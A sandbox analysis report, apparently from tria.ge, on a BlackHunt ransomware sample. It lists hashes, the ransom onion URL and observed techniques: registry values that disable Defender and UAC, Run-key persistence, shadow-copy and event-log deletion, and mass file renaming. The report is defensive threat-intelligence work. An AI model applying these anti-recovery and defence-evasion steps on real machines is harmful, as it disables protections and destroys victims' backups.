Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
88s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:38
Static task
static1
Behavioral task
behavioral1
Sample
68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe
Resource
win10v2004-20231215-en
General
-
Target
68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe
-
Size
707KB
-
MD5
36249336945a46b4936c389440b2e0eb
-
SHA1
d5d60d279e740cd2c5cfeec940a4cb6b6d35a6fe
-
SHA256
68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b
-
SHA512
19d193ad0edaf19460e56f58c10e6bee317b0e1fc5b220a77e918953e0a5f4416304dd0189a3ca3f523bd92c2577508b06e6c8493eaf164c73c2e15fcb3c9d6f
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1Y8wvnh:6uaTmkZJ+naie5OTamgEoKxLWbuh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5544 fsutil.exe 6956 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 8308 wevtutil.exe 15760 wevtutil.exe 6868 wevtutil.exe 3872 wevtutil.exe 15780 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 10156 bcdedit.exe 10908 bcdedit.exe 14612 bcdedit.exe 8116 bcdedit.exe -
Renames multiple (3361) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 8236 wbadmin.exe 14156 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\T: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\J: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\N: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\G: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\U: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\A: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\M: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\W: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\L: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\I: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\P: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\S: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\Z: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\O: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\K: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\X: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\V: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\B: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\R: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\Y: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\H: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\dot_2x.png 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ru-ru\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\ui-strings.js 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sv-se\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\locale\he\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\plugin.js 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-fr\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Info2x.png 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions2x.png 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\it-it\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\es-es\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-il\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hu-hu\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-disabled.svg 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-fr\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\root\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\ui-strings.js 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Google\Update\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_retina.png 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\x.cur 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nb-no\ui-strings.js 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\en-il\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\az_get.svg 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sv-se\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down-pressed.gif 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-cn\ui-strings.js 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\reflow.api 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-sl\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nl-nl\ui-strings.js 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\sunec.jar 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\dotnet\ThirdPartyNotices.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 9844 15540 WerFault.exe 287 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8744 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 18176 vssadmin.exe 8820 vssadmin.exe 10052 vssadmin.exe 5784 vssadmin.exe 5204 vssadmin.exe 6248 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 8468 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" Conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon Conhost.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 11052 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Token: SeRestorePrivilege 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Token: SeBackupPrivilege 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Token: SeTakeOwnershipPrivilege 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Token: SeAuditPrivilege 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Token: SeSecurityPrivilege 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Token: SeIncBasePriorityPrivilege 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Token: SeBackupPrivilege 13112 wbengine.exe Token: SeRestorePrivilege 13112 wbengine.exe Token: SeSecurityPrivilege 13112 wbengine.exe Token: SeBackupPrivilege 12812 vssvc.exe Token: SeRestorePrivilege 12812 vssvc.exe Token: SeAuditPrivilege 12812 vssvc.exe Token: SeSecurityPrivilege 8308 wevtutil.exe Token: SeBackupPrivilege 8308 wevtutil.exe Token: SeSecurityPrivilege 15760 wevtutil.exe Token: SeBackupPrivilege 15760 wevtutil.exe Token: SeSecurityPrivilege 3872 wevtutil.exe Token: SeBackupPrivilege 3872 wevtutil.exe Token: SeSecurityPrivilege 6868 wevtutil.exe Token: SeBackupPrivilege 6868 wevtutil.exe Token: SeSecurityPrivilege 15780 wevtutil.exe Token: SeBackupPrivilege 15780 wevtutil.exe Token: SeDebugPrivilege 8468 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3720 wrote to memory of 2704 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 90 PID 3720 wrote to memory of 2704 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 90 PID 3720 wrote to memory of 1748 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 93 PID 3720 wrote to memory of 1748 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 93 PID 3720 wrote to memory of 3460 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 96 PID 3720 wrote to memory of 3460 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 96 PID 3720 wrote to memory of 1252 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 158 PID 3720 wrote to memory of 1252 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 158 PID 2704 wrote to memory of 4996 2704 cmd.exe 100 PID 2704 wrote to memory of 4996 2704 cmd.exe 100 PID 3720 wrote to memory of 3552 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 98 PID 3720 wrote to memory of 3552 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 98 PID 1748 wrote to memory of 3800 1748 cmd.exe 140 PID 1748 wrote to memory of 3800 1748 cmd.exe 140 PID 3460 wrote to memory of 4616 3460 cmd.exe 147 PID 3460 wrote to memory of 4616 3460 cmd.exe 147 PID 1252 wrote to memory of 3884 1252 reg.exe 193 PID 1252 wrote to memory of 3884 1252 reg.exe 193 PID 3720 wrote to memory of 3872 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 103 PID 3720 wrote to memory of 3872 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 103 PID 3720 wrote to memory of 4544 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 104 PID 3720 wrote to memory of 4544 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 104 PID 3720 wrote to memory of 3024 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 163 PID 3720 wrote to memory of 3024 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 163 PID 3720 wrote to memory of 4536 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 105 PID 3720 wrote to memory of 4536 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 105 PID 3552 wrote to memory of 4784 3552 cmd.exe 191 PID 3552 wrote to memory of 4784 3552 cmd.exe 191 PID 3720 wrote to memory of 4836 3720 